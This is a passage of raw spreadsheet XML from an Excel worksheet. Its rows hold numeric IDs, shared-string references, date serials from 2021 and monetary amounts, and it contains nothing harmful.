        <v>12821</v>
      </c>
    </row>
    <row r="4060" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4060">
        <v>24424</v>
      </c>
      <c r="B4060">
        <v>29</v>
      </c>
      <c r="C4060" t="s">
        <v>1899</v>
      </c>
      <c r="D4060" t="s">
        <v>13081</v>
      </c>
      <c r="E4060">
        <v>17</v>
      </c>
      <c r="F4060" t="s">
        <v>12158</v>
      </c>
      <c r="G4060" s="1">
        <v>44293</v>
      </c>
      <c r="H4060">
        <v>12000</v>
      </c>
      <c r="J4060" t="s">
        <v>12821</v>
      </c>
    </row>
    <row r="4061" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4061">
        <v>24425</v>
      </c>
      <c r="B4061">
        <v>29</v>
      </c>
      <c r="C4061" t="s">
        <v>1899</v>
      </c>
      <c r="D4061" t="s">
        <v>13081</v>
      </c>
      <c r="E4061">
        <v>17</v>
      </c>
      <c r="F4061" t="s">
        <v>9556</v>
      </c>
      <c r="G4061" s="1">
        <v>44293</v>
      </c>
      <c r="H4061">
        <v>12000</v>
      </c>
      <c r="J4061" t="s">
        <v>12821</v>
      </c>
    </row>
    <row r="4062" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4062">
        <v>24426</v>
      </c>
      <c r="B4062">
        <v>91</v>
      </c>
      <c r="C4062" t="s">
        <v>2294</v>
      </c>
      <c r="D4062" t="s">
        <v>13295</v>
      </c>
      <c r="E4062">
        <v>12</v>
      </c>
      <c r="F4062" t="s">
        <v>764</v>
      </c>
      <c r="G4062" s="1">
        <v>44284</v>
      </c>
      <c r="H4062">
        <v>180000</v>
      </c>
      <c r="J4062" t="s">
        <v>10103</v>
      </c>
    </row>
    <row r="4063" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4063">
        <v>24427</v>
      </c>
      <c r="B4063">
        <v>2733</v>
      </c>
      <c r="C4063" t="s">
        <v>8671</v>
      </c>
      <c r="D4063" t="s">
        <v>13296</v>
      </c>
      <c r="E4063">
        <v>18</v>
      </c>
      <c r="F4063" t="s">
        <v>9217</v>
      </c>
      <c r="G4063" s="1">
        <v>44260</v>
      </c>
      <c r="H4063">
        <v>93750</v>
      </c>
      <c r="I4063" t="s">
        <v>13297</v>
      </c>
      <c r="J4063" t="s">
        <v>13298</v>
      </c>
    </row>
    <row r="4064" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4064">
        <v>24428</v>
      </c>
      <c r="B4064">
        <v>1285</v>
      </c>
      <c r="C4064" t="s">
        <v>4443</v>
      </c>
      <c r="D4064" t="s">
        <v>13299</v>
      </c>
      <c r="E4064">
        <v>26</v>
      </c>
      <c r="F4064" t="s">
        <v>364</v>
      </c>
      <c r="G4064" s="1">
        <v>44281</v>
      </c>
      <c r="H4064">
        <v>2000000</v>
      </c>
      <c r="I4064" t="s">
        <v>9536</v>
      </c>
      <c r="J4064" t="s">
        <v>13300</v>
      </c>
    </row>
    <row r="4065" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4065">
        <v>24429</v>
      </c>
      <c r="B4065">
        <v>1676</v>
      </c>
      <c r="C4065" t="s">
        <v>4428</v>
      </c>
      <c r="D4065" t="s">
        <v>13301</v>
      </c>
      <c r="E4065">
        <v>29</v>
      </c>
      <c r="F4065" t="s">
        <v>2236</v>
      </c>
      <c r="G4065" s="1">
        <v>44302</v>
      </c>
      <c r="H4065">
        <v>20000</v>
      </c>
      <c r="I4065" t="s">
        <v>9550</v>
      </c>
      <c r="J4065" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="4066" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4066">
        <v>24430</v>
      </c>
      <c r="B4066">
        <v>1676</v>
      </c>
      <c r="C4066" t="s">
        <v>4428</v>
      </c>
      <c r="D4066" t="s">
        <v>13301</v>
      </c>
      <c r="E4066">
        <v>29</v>
      </c>
      <c r="F4066" t="s">
        <v>4686</v>
      </c>
      <c r="G4066" s="1">
        <v>44302</v>
      </c>
      <c r="H4066">
        <v>10000</v>
      </c>
      <c r="I4066" t="s">
        <v>9965</v>
      </c>
      <c r="J4066" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="4067" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4067">
        <v>24431</v>
      </c>
      <c r="B4067">
        <v>1676</v>
      </c>
      <c r="C4067" t="s">
        <v>4428</v>
      </c>
      <c r="D4067" t="s">
        <v>13301</v>
      </c>
      <c r="E4067">
        <v>29</v>
      </c>
      <c r="F4067" t="s">
        <v>13302</v>
      </c>
      <c r="G4067" s="1">
        <v>44302</v>
      </c>
      <c r="H4067">
        <v>5000</v>
      </c>
      <c r="I4067" t="s">
        <v>9550</v>
      </c>
      <c r="J4067" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="4068" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4068">
        <v>24432</v>
      </c>
      <c r="B4068">
        <v>1676</v>
      </c>
      <c r="C4068" t="s">
        <v>4428</v>
      </c>
      <c r="D4068" t="s">
        <v>13301</v>
      </c>
      <c r="E4068">
        <v>29</v>
      </c>
      <c r="F4068" t="s">
        <v>13303</v>
      </c>
      <c r="G4068" s="1">
        <v>44302</v>
      </c>
      <c r="H4068">
        <v>5000</v>
      </c>
      <c r="I4068" t="s">
        <v>9550</v>
      </c>
      <c r="J4068" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="4069" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4069">
        <v>24434</v>
      </c>
      <c r="B4069">
        <v>1676</v>
      </c>
      <c r="C4069" t="s">
        <v>4428</v>
      </c>
      <c r="D4069" t="s">
        <v>13301</v>
      </c>
      <c r="E4069">
        <v>29</v>
      </c>
      <c r="F4069" t="s">
        <v>13304</v>
      </c>
      <c r="G4069" s="1">
        <v>44302</v>
      </c>
      <c r="H4069">
        <v>30000</v>
      </c>
      <c r="I4069" t="s">
        <v>9965</v>
      </c>
      <c r="J4069" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="4070" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4070">
        <v>24435</v>
      </c>
      <c r="B4070">
        <v>1676</v>
      </c>
      <c r="C4070" t="s">
        <v>4428</v>
      </c>
      <c r="D4070" t="s">
        <v>13301</v>
      </c>
      <c r="E4070">
        <v>29</v>
      </c>
      <c r="F4070" t="s">
        <v>13305</v>
      </c>
      <c r="G4070" s="1">
        <v>44302</v>
      </c>
      <c r="H4070">
        <v>10000</v>
      </c>
      <c r="I4070" t="s">
        <v>9965</v>
      </c>
      <c r="J4070" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="4071" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4071">
        <v>24436</v>
      </c>
      <c r="B4071">
        <v>2733</v>
      </c>
      <c r="C4071" t="s">
        <v>8671</v>
      </c>
      <c r="D4071" t="s">
        <v>13296</v>
      </c>
      <c r="E4071">
        <v>18</v>
      </c>
      <c r="F4071" t="s">
        <v>9217</v>
      </c>
      <c r="G4071" s="1">
        <v>44312</v>
      </c>
      <c r="H4071">
        <v>36000</v>
      </c>
      <c r="I4071" t="s">
        <v>13297</v>
      </c>
      <c r="J4071" t="s">
        <v>13306</v>
      </c>
    </row>
    <row r="4072" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4072">
        <v>24438</v>
      </c>
      <c r="B4072">
        <v>2558</v>
      </c>
      <c r="C4072" t="s">
        <v>4971</v>
      </c>
      <c r="D4072" t="s">
        <v>10001</v>
      </c>
      <c r="E4072">
        <v>12</v>
      </c>
      <c r="F4072" t="s">
        <v>13307</v>
      </c>
      <c r="G4072" s="1">
        <v>44302</v>
      </c>
      <c r="H4072">
        <v>660000</v>
      </c>
      <c r="J4072" t="s">
        <v>13308</v>
      </c>
    </row>
    <row r="4073" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4073">
        <v>24439</v>
      </c>
      <c r="B4073">
        <v>2558</v>
      </c>
      <c r="C4073" t="s">
        <v>4971</v>
      </c>
      <c r="D4073" t="s">
        <v>10001</v>
      </c>
      <c r="E4073">
        <v>12</v>
      </c>
      <c r="F4073" t="s">
        <v>13309</v>
      </c>
      <c r="G4073" s="1">
        <v>44302</v>
      </c>
      <c r="H4073">
        <v>60000</v>
      </c>
      <c r="J4073" t="s">
        <v>13310</v>
      </c>
    </row>
    <row r="4074" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4074">
        <v>24440</v>
      </c>
      <c r="B4074">
        <v>2558</v>
      </c>
      <c r="C4074" t="s">
        <v>4971</v>
      </c>
      <c r="D4074" t="s">
        <v>10001</v>
      </c>
      <c r="E4074">
        <v>12</v>
      </c>
      <c r="F4074" t="s">
        <v>13311</v>
      </c>
      <c r="G4074" s="1">
        <v>44302</v>
      </c>
      <c r="H4074">
        <v>450000</v>
      </c>
      <c r="J4074" t="s">
        <v>13312</v>
      </c>
    </row>
    <row r="4075" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4075">
        <v>24441</v>
      </c>
      <c r="B4075">
        <v>2558</v>
      </c>
      <c r="C4075" t="s">
        <v>4971</v>
      </c>
      <c r="D4075" t="s">
        <v>10001</v>
      </c>
      <c r="E4075">
        <v>12</v>
      </c>
      <c r="F4075" t="s">
        <v>9437</v>
      </c>
      <c r="G4075" s="1">
        <v>44302</v>
      </c>
      <c r="H4075">
        <v>120000</v>
      </c>
      <c r="J4075" t="s">
        <v>13313</v>
      </c>
    </row>
    <row r="4076" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4076">
        <v>24442</v>
      </c>
      <c r="B4076">
        <v>2558</v>
      </c>
      <c r="C4076" t="s">
        <v>4971</v>
      </c>
      <c r="D4076" t="s">
        <v>10001</v>
      </c>
      <c r="E4076">
        <v>12</v>
      </c>
      <c r="F4076" t="s">
        <v>10651</v>
      </c>
      <c r="G4076" s="1">
        <v>44302</v>
      </c>
      <c r="H4076">
        <v>480000</v>
      </c>
      <c r="J4076" t="s">
        <v>13314</v>
      </c>
    </row>
    <row r="4077" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4077">
        <v>24443</v>
      </c>
      <c r="B4077">
        <v>2558</v>
      </c>
      <c r="C4077" t="s">
        <v>4971</v>
      </c>
      <c r="D4077" t="s">
        <v>10001</v>
      </c>
      <c r="E4077">
        <v>12</v>
      </c>
      <c r="F4077" t="s">
        <v>609</v>
      </c>
      <c r="G4077" s="1">
        <v>44302</v>
      </c>
      <c r="H4077">
        <v>60000</v>
      </c>
      <c r="J4077" t="s">
        <v>13315</v>
      </c>
    </row>
    <row r="4078" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4078">
        <v>24444</v>
      </c>
      <c r="B4078">
        <v>2558</v>
      </c>
      <c r="C4078" t="s">
        <v>4971</v>
      </c>
      <c r="D4078" t="s">
        <v>10001</v>
      </c>
      <c r="E4078">
        <v>12</v>
      </c>
      <c r="F4078" t="s">
        <v>9681</v>
      </c>
      <c r="G4078" s="1">
        <v>44302</v>
      </c>
      <c r="H4078">
        <v>30000</v>
      </c>
      <c r="J4078" t="s">
        <v>13316</v>
      </c>
    </row>
    <row r="4079" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4079">
        <v>24445</v>
      </c>
      <c r="B4079">
        <v>2558</v>
      </c>
      <c r="C4079" t="s">
        <v>4971</v>
      </c>
      <c r="D4079" t="s">
        <v>10001</v>
      </c>
      <c r="E4079">
        <v>12</v>
      </c>
      <c r="F4079" t="s">
        <v>2236</v>
      </c>
      <c r="G4079" s="1">
        <v>44302</v>
      </c>
      <c r="H4079">
        <v>1140000</v>
      </c>
      <c r="J4079" t="s">
        <v>13317</v>
      </c>
    </row>
    <row r="4080" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4080">
        <v>24446</v>
      </c>
      <c r="B4080">
        <v>1781</v>
      </c>
      <c r="C4080" t="s">
        <v>16529</v>
      </c>
      <c r="D4080" t="s">
        <v>16530</v>
      </c>
      <c r="E4080">
        <v>13</v>
      </c>
      <c r="F4080" t="s">
        <v>3462</v>
      </c>
      <c r="G4080" s="1">
        <v>44313</v>
      </c>
      <c r="H4080" s="4">
        <v>200000</v>
      </c>
      <c r="J4080" t="s">
        <v>13318</v>
      </c>
    </row>
    <row r="4081" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4081">
        <v>24447</v>
      </c>
      <c r="B4081">
        <v>524</v>
      </c>
      <c r="C4081" t="s">
        <v>2307</v>
      </c>
      <c r="D4081" t="s">
        <v>9599</v>
      </c>
      <c r="E4081">
        <v>33</v>
      </c>
      <c r="F4081" t="s">
        <v>945</v>
      </c>
      <c r="G4081" s="1">
        <v>44278</v>
      </c>
      <c r="H4081">
        <v>531000</v>
      </c>
      <c r="I4081" t="s">
        <v>13319</v>
      </c>
      <c r="J4081" t="s">
        <v>13320</v>
      </c>
    </row>
    <row r="4082" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4082">
        <v>24448</v>
      </c>
      <c r="B4082">
        <v>524</v>
      </c>
      <c r="C4082" t="s">
        <v>2307</v>
      </c>
      <c r="D4082" t="s">
        <v>9599</v>
      </c>
      <c r="E4082">
        <v>33</v>
      </c>
      <c r="F4082" t="s">
        <v>6917</v>
      </c>
      <c r="G4082" s="1">
        <v>44278</v>
      </c>
      <c r="H4082">
        <v>0</v>
      </c>
      <c r="I4082" t="s">
        <v>11550</v>
      </c>
    </row>
    <row r="4083" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4083">
        <v>24449</v>
      </c>
      <c r="B4083">
        <v>524</v>
      </c>
      <c r="C4083" t="s">
        <v>2307</v>
      </c>
      <c r="D4083" t="s">
        <v>9599</v>
      </c>
      <c r="E4083">
        <v>33</v>
      </c>
      <c r="F4083" t="s">
        <v>4062</v>
      </c>
      <c r="G4083" s="1">
        <v>44278</v>
      </c>
      <c r="H4083">
        <v>0</v>
      </c>
    </row>
    <row r="4084" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4084">
        <v>24450</v>
      </c>
      <c r="B4084">
        <v>524</v>
      </c>
      <c r="C4084" t="s">
        <v>2307</v>
      </c>
      <c r="D4084" t="s">
        <v>9599</v>
      </c>
      <c r="E4084">
        <v>33</v>
      </c>
      <c r="F4084" t="s">
        <v>13321</v>
      </c>
      <c r="G4084" s="1">
        <v>44278</v>
      </c>
      <c r="H4084">
        <v>76900</v>
      </c>
      <c r="I4084" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="4085" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4085">
        <v>24451</v>
      </c>
      <c r="B4085">
        <v>1177</v>
      </c>
      <c r="C4085" t="s">
        <v>4341</v>
      </c>
      <c r="D4085" t="s">
        <v>13322</v>
      </c>
      <c r="E4085">
        <v>5</v>
      </c>
      <c r="F4085" t="s">
        <v>13323</v>
      </c>
      <c r="G4085" s="1">
        <v>44299</v>
      </c>
      <c r="H4085">
        <v>69000</v>
      </c>
      <c r="I4085" t="s">
        <v>13324</v>
      </c>
      <c r="J4085" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4086" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4086">
        <v>24452</v>
      </c>
      <c r="B4086">
        <v>1177</v>
      </c>
      <c r="C4086" t="s">
        <v>4341</v>
      </c>
      <c r="D4086" t="s">
        <v>13322</v>
      </c>
      <c r="E4086">
        <v>5</v>
      </c>
      <c r="F4086" t="s">
        <v>13325</v>
      </c>
      <c r="G4086" s="1">
        <v>44299</v>
      </c>
      <c r="H4086">
        <v>46000</v>
      </c>
      <c r="I4086" t="s">
        <v>13324</v>
      </c>
      <c r="J4086" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4087" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4087">
        <v>24456</v>
      </c>
      <c r="B4087">
        <v>1611</v>
      </c>
      <c r="C4087" t="s">
        <v>2858</v>
      </c>
      <c r="D4087" t="s">
        <v>11114</v>
      </c>
      <c r="E4087">
        <v>16</v>
      </c>
      <c r="F4087" t="s">
        <v>9681</v>
      </c>
      <c r="G4087" s="1">
        <v>44265</v>
      </c>
      <c r="H4087">
        <v>80000</v>
      </c>
      <c r="I4087" t="s">
        <v>13326</v>
      </c>
      <c r="J4087" t="s">
        <v>13327</v>
      </c>
    </row>
    <row r="4088" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4088">
        <v>24457</v>
      </c>
      <c r="B4088">
        <v>2204</v>
      </c>
      <c r="C4088" t="s">
        <v>6453</v>
      </c>
      <c r="D4088" t="s">
        <v>13328</v>
      </c>
      <c r="E4088">
        <v>2</v>
      </c>
      <c r="F4088" t="s">
        <v>1139</v>
      </c>
      <c r="G4088" s="1">
        <v>44361</v>
      </c>
      <c r="H4088">
        <v>30000</v>
      </c>
      <c r="J4088" t="s">
        <v>13329</v>
      </c>
    </row>
    <row r="4089" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4089">
        <v>24460</v>
      </c>
      <c r="B4089">
        <v>133</v>
      </c>
      <c r="C4089" t="s">
        <v>264</v>
      </c>
      <c r="D4089" t="s">
        <v>9680</v>
      </c>
      <c r="E4089">
        <v>12</v>
      </c>
      <c r="F4089" t="s">
        <v>13330</v>
      </c>
      <c r="G4089" s="1">
        <v>44305</v>
      </c>
      <c r="H4089">
        <v>360000</v>
      </c>
      <c r="J4089" t="s">
        <v>13331</v>
      </c>
    </row>
    <row r="4090" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4090">
        <v>24461</v>
      </c>
      <c r="B4090">
        <v>133</v>
      </c>
      <c r="C4090" t="s">
        <v>264</v>
      </c>
      <c r="D4090" t="s">
        <v>9680</v>
      </c>
      <c r="E4090">
        <v>12</v>
      </c>
      <c r="F4090" t="s">
        <v>13332</v>
      </c>
      <c r="G4090" s="1">
        <v>44305</v>
      </c>
      <c r="H4090">
        <v>225000</v>
      </c>
      <c r="J4090" t="s">
        <v>13333</v>
      </c>
    </row>
    <row r="4091" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4091">
        <v>24462</v>
      </c>
      <c r="B4091">
        <v>133</v>
      </c>
      <c r="C4091" t="s">
        <v>264</v>
      </c>
      <c r="D4091" t="s">
        <v>9680</v>
      </c>
      <c r="E4091">
        <v>12</v>
      </c>
      <c r="F4091" t="s">
        <v>2236</v>
      </c>
      <c r="G4091" s="1">
        <v>44305</v>
      </c>
      <c r="H4091">
        <v>570000</v>
      </c>
      <c r="J4091" t="s">
        <v>13333</v>
      </c>
    </row>
    <row r="4092" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4092">
        <v>24463</v>
      </c>
      <c r="B4092">
        <v>133</v>
      </c>
      <c r="C4092" t="s">
        <v>264</v>
      </c>
      <c r="D4092" t="s">
        <v>9680</v>
      </c>
      <c r="E4092">
        <v>12</v>
      </c>
      <c r="F4092" t="s">
        <v>9437</v>
      </c>
      <c r="G4092" s="1">
        <v>44305</v>
      </c>
      <c r="H4092">
        <v>60000</v>
      </c>
      <c r="J4092" t="s">
        <v>13334</v>
      </c>
    </row>
    <row r="4093" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4093">
        <v>24464</v>
      </c>
      <c r="B4093">
        <v>133</v>
      </c>
      <c r="C4093" t="s">
        <v>264</v>
      </c>
      <c r="D4093" t="s">
        <v>9680</v>
      </c>
      <c r="E4093">
        <v>12</v>
      </c>
      <c r="F4093" t="s">
        <v>10651</v>
      </c>
      <c r="G4093" s="1">
        <v>44305</v>
      </c>
      <c r="H4093">
        <v>240000</v>
      </c>
      <c r="J4093" t="s">
        <v>13333</v>
      </c>
    </row>
    <row r="4094" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4094">
        <v>24465</v>
      </c>
      <c r="B4094">
        <v>133</v>
      </c>
      <c r="C4094" t="s">
        <v>264</v>
      </c>
      <c r="D4094" t="s">
        <v>9680</v>
      </c>
      <c r="E4094">
        <v>12</v>
      </c>
      <c r="F4094" t="s">
        <v>609</v>
      </c>
      <c r="G4094" s="1">
        <v>44305</v>
      </c>
      <c r="H4094">
        <v>30000</v>
      </c>
      <c r="J4094" t="s">
        <v>13335</v>
      </c>
    </row>
    <row r="4095" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4095">
        <v>24466</v>
      </c>
      <c r="B4095">
        <v>133</v>
      </c>
      <c r="C4095" t="s">
        <v>264</v>
      </c>
      <c r="D4095" t="s">
        <v>9680</v>
      </c>
      <c r="E4095">
        <v>12</v>
      </c>
      <c r="F4095" t="s">
        <v>9681</v>
      </c>
      <c r="G4095" s="1">
        <v>44305</v>
      </c>
      <c r="H4095">
        <v>15000</v>
      </c>
      <c r="J4095" t="s">
        <v>13316</v>
      </c>
    </row>
    <row r="4096" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4096">
        <v>24475</v>
      </c>
      <c r="B4096">
        <v>1117</v>
      </c>
      <c r="C4096" t="s">
        <v>3156</v>
      </c>
      <c r="D4096" t="s">
        <v>11320</v>
      </c>
      <c r="E4096">
        <v>16</v>
      </c>
      <c r="F4096" t="s">
        <v>13336</v>
      </c>
      <c r="G4096" s="1">
        <v>44323</v>
      </c>
      <c r="H4096">
        <v>10000</v>
      </c>
      <c r="I4096" t="s">
        <v>11338</v>
      </c>
      <c r="J4096" t="s">
        <v>10958</v>
      </c>
    </row>
    <row r="4097" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4097">
        <v>24476</v>
      </c>
      <c r="B4097">
        <v>1117</v>
      </c>
      <c r="C4097" t="s">
        <v>3156</v>
      </c>
      <c r="D4097" t="s">
        <v>11320</v>
      </c>
      <c r="E4097">
        <v>16</v>
      </c>
      <c r="F4097" t="s">
        <v>3814</v>
      </c>
      <c r="G4097" s="1">
        <v>44323</v>
      </c>
      <c r="H4097">
        <v>10000</v>
      </c>
      <c r="I4097" t="s">
        <v>11338</v>
      </c>
      <c r="J4097" t="s">
        <v>10958</v>
      </c>
    </row>
    <row r="4098" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4098">
        <v>24477</v>
      </c>
      <c r="B4098">
        <v>1117</v>
      </c>
      <c r="C4098" t="s">
        <v>3156</v>
      </c>
      <c r="D4098" t="s">
        <v>11320</v>
      </c>
      <c r="E4098">
        <v>16</v>
      </c>
      <c r="F4098" t="s">
        <v>13337</v>
      </c>
      <c r="G4098" s="1">
        <v>44323</v>
      </c>
      <c r="H4098">
        <v>10000</v>
      </c>
      <c r="I4098" t="s">
        <v>9436</v>
      </c>
      <c r="J4098" t="s">
        <v>13338</v>
      </c>
    </row>
    <row r="4099" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4099">
        <v>24479</v>
      </c>
      <c r="B4099">
        <v>1117</v>
      </c>
      <c r="C4099" t="s">
        <v>3156</v>
      </c>
      <c r="D4099" t="s">
        <v>11320</v>
      </c>
      <c r="E4099">
        <v>16</v>
      </c>
      <c r="F4099" t="s">
        <v>9435</v>
      </c>
      <c r="G4099" s="1">
        <v>44323</v>
      </c>
      <c r="H4099">
        <v>10000</v>
      </c>
      <c r="I4099" t="s">
        <v>11338</v>
      </c>
      <c r="J4099" t="s">
        <v>13339</v>
      </c>
    </row>
    <row r="4100" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4100">
        <v>24480</v>
      </c>
      <c r="B4100">
        <v>1117</v>
      </c>
      <c r="C4100" t="s">
        <v>3156</v>
      </c>
      <c r="D4100" t="s">
        <v>11320</v>
      </c>
      <c r="E4100">
        <v>16</v>
      </c>
      <c r="F4100" t="s">
        <v>9849</v>
      </c>
      <c r="G4100" s="1">
        <v>44323</v>
      </c>
      <c r="H4100">
        <v>10000</v>
      </c>
      <c r="I4100" t="s">
        <v>11338</v>
      </c>
      <c r="J4100" t="s">
        <v>11047</v>
      </c>
    </row>
    <row r="4101" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4101">
        <v>24481</v>
      </c>
      <c r="B4101">
        <v>1117</v>
      </c>
      <c r="C4101" t="s">
        <v>3156</v>
      </c>
      <c r="D4101" t="s">
        <v>11320</v>
      </c>
      <c r="E4101">
        <v>16</v>
      </c>
      <c r="F4101" t="s">
        <v>9437</v>
      </c>
      <c r="G4101" s="1">
        <v>44323</v>
      </c>
      <c r="H4101">
        <v>10000</v>
      </c>
      <c r="I4101" t="s">
        <v>11338</v>
      </c>
      <c r="J4101" t="s">
        <v>13340</v>
      </c>
    </row>
    <row r="4102" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4102">
        <v>24482</v>
      </c>
      <c r="B4102">
        <v>1117</v>
      </c>
      <c r="C4102" t="s">
        <v>3156</v>
      </c>
      <c r="D4102" t="s">
        <v>11320</v>
      </c>
      <c r="E4102">
        <v>16</v>
      </c>
      <c r="F4102" t="s">
        <v>13341</v>
      </c>
      <c r="G4102" s="1">
        <v>44323</v>
      </c>
      <c r="H4102">
        <v>10000</v>
      </c>
      <c r="I4102" t="s">
        <v>11338</v>
      </c>
      <c r="J4102" t="s">
        <v>13342</v>
      </c>
    </row>
    <row r="4103" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4103">
        <v>24484</v>
      </c>
      <c r="B4103">
        <v>80</v>
      </c>
      <c r="C4103" t="s">
        <v>1543</v>
      </c>
      <c r="D4103" t="s">
        <v>11197</v>
      </c>
      <c r="E4103">
        <v>12</v>
      </c>
      <c r="F4103" t="s">
        <v>3814</v>
      </c>
      <c r="G4103" s="1">
        <v>44265</v>
      </c>
      <c r="H4103">
        <v>500</v>
      </c>
      <c r="J4103" t="s">
        <v>13343</v>
      </c>
    </row>
    <row r="4104" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4104">
        <v>24485</v>
      </c>
      <c r="B4104">
        <v>80</v>
      </c>
      <c r="C4104" t="s">
        <v>1543</v>
      </c>
      <c r="D4104" t="s">
        <v>11197</v>
      </c>
      <c r="E4104">
        <v>12</v>
      </c>
      <c r="F4104" t="s">
        <v>9577</v>
      </c>
      <c r="G4104" s="1">
        <v>44265</v>
      </c>
      <c r="H4104">
        <v>400</v>
      </c>
      <c r="J4104" t="s">
        <v>13344</v>
      </c>
    </row>
    <row r="4105" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4105">
        <v>24486</v>
      </c>
      <c r="B4105">
        <v>80</v>
      </c>
      <c r="C4105" t="s">
        <v>1543</v>
      </c>
      <c r="D4105" t="s">
        <v>11197</v>
      </c>
      <c r="E4105">
        <v>12</v>
      </c>
      <c r="F4105" t="s">
        <v>11419</v>
      </c>
      <c r="G4105" s="1">
        <v>44265</v>
      </c>
      <c r="H4105">
        <v>450</v>
      </c>
      <c r="J4105" t="s">
        <v>13345</v>
      </c>
    </row>
    <row r="4106" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4106">
        <v>24487</v>
      </c>
      <c r="B4106">
        <v>5304</v>
      </c>
      <c r="C4106" t="s">
        <v>8539</v>
      </c>
      <c r="D4106" t="s">
        <v>13143</v>
      </c>
      <c r="E4106">
        <v>12</v>
      </c>
      <c r="F4106" t="s">
        <v>10130</v>
      </c>
      <c r="G4106" s="1">
        <v>44265</v>
      </c>
      <c r="H4106">
        <v>500</v>
      </c>
      <c r="J4106" t="s">
        <v>10037</v>
      </c>
    </row>
    <row r="4107" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4107">
        <v>24491</v>
      </c>
      <c r="B4107">
        <v>80</v>
      </c>
      <c r="C4107" t="s">
        <v>1543</v>
      </c>
      <c r="D4107" t="s">
        <v>11197</v>
      </c>
      <c r="E4107">
        <v>12</v>
      </c>
      <c r="F4107" t="s">
        <v>10130</v>
      </c>
      <c r="G4107" s="1">
        <v>44265</v>
      </c>
      <c r="H4107">
        <v>250</v>
      </c>
      <c r="J4107" t="s">
        <v>13346</v>
      </c>
    </row>
    <row r="4108" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4108">
        <v>24492</v>
      </c>
      <c r="B4108">
        <v>2217</v>
      </c>
      <c r="C4108" t="s">
        <v>6370</v>
      </c>
      <c r="D4108" t="s">
        <v>9622</v>
      </c>
      <c r="E4108">
        <v>5</v>
      </c>
      <c r="F4108" t="s">
        <v>13347</v>
      </c>
      <c r="G4108" s="1">
        <v>44252</v>
      </c>
      <c r="H4108">
        <v>10000</v>
      </c>
      <c r="J4108" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="4109" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4109">
        <v>24493</v>
      </c>
      <c r="B4109">
        <v>5451</v>
      </c>
      <c r="C4109" t="s">
        <v>4860</v>
      </c>
      <c r="D4109" t="s">
        <v>13348</v>
      </c>
      <c r="E4109">
        <v>16</v>
      </c>
      <c r="F4109" t="s">
        <v>9458</v>
      </c>
      <c r="G4109" s="1">
        <v>44375</v>
      </c>
      <c r="H4109">
        <v>30000</v>
      </c>
      <c r="I4109" t="s">
        <v>10010</v>
      </c>
      <c r="J4109" t="s">
        <v>10391</v>
      </c>
    </row>
    <row r="4110" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4110">
        <v>24494</v>
      </c>
      <c r="B4110">
        <v>5451</v>
      </c>
      <c r="C4110" t="s">
        <v>4860</v>
      </c>
      <c r="D4110" t="s">
        <v>13348</v>
      </c>
      <c r="E4110">
        <v>16</v>
      </c>
      <c r="F4110" t="s">
        <v>13349</v>
      </c>
      <c r="G4110" s="1">
        <v>44375</v>
      </c>
      <c r="H4110">
        <v>50000</v>
      </c>
      <c r="J4110" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4111" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4111">
        <v>24495</v>
      </c>
      <c r="B4111">
        <v>1638</v>
      </c>
      <c r="C4111" t="s">
        <v>3210</v>
      </c>
      <c r="D4111" t="s">
        <v>13350</v>
      </c>
      <c r="E4111">
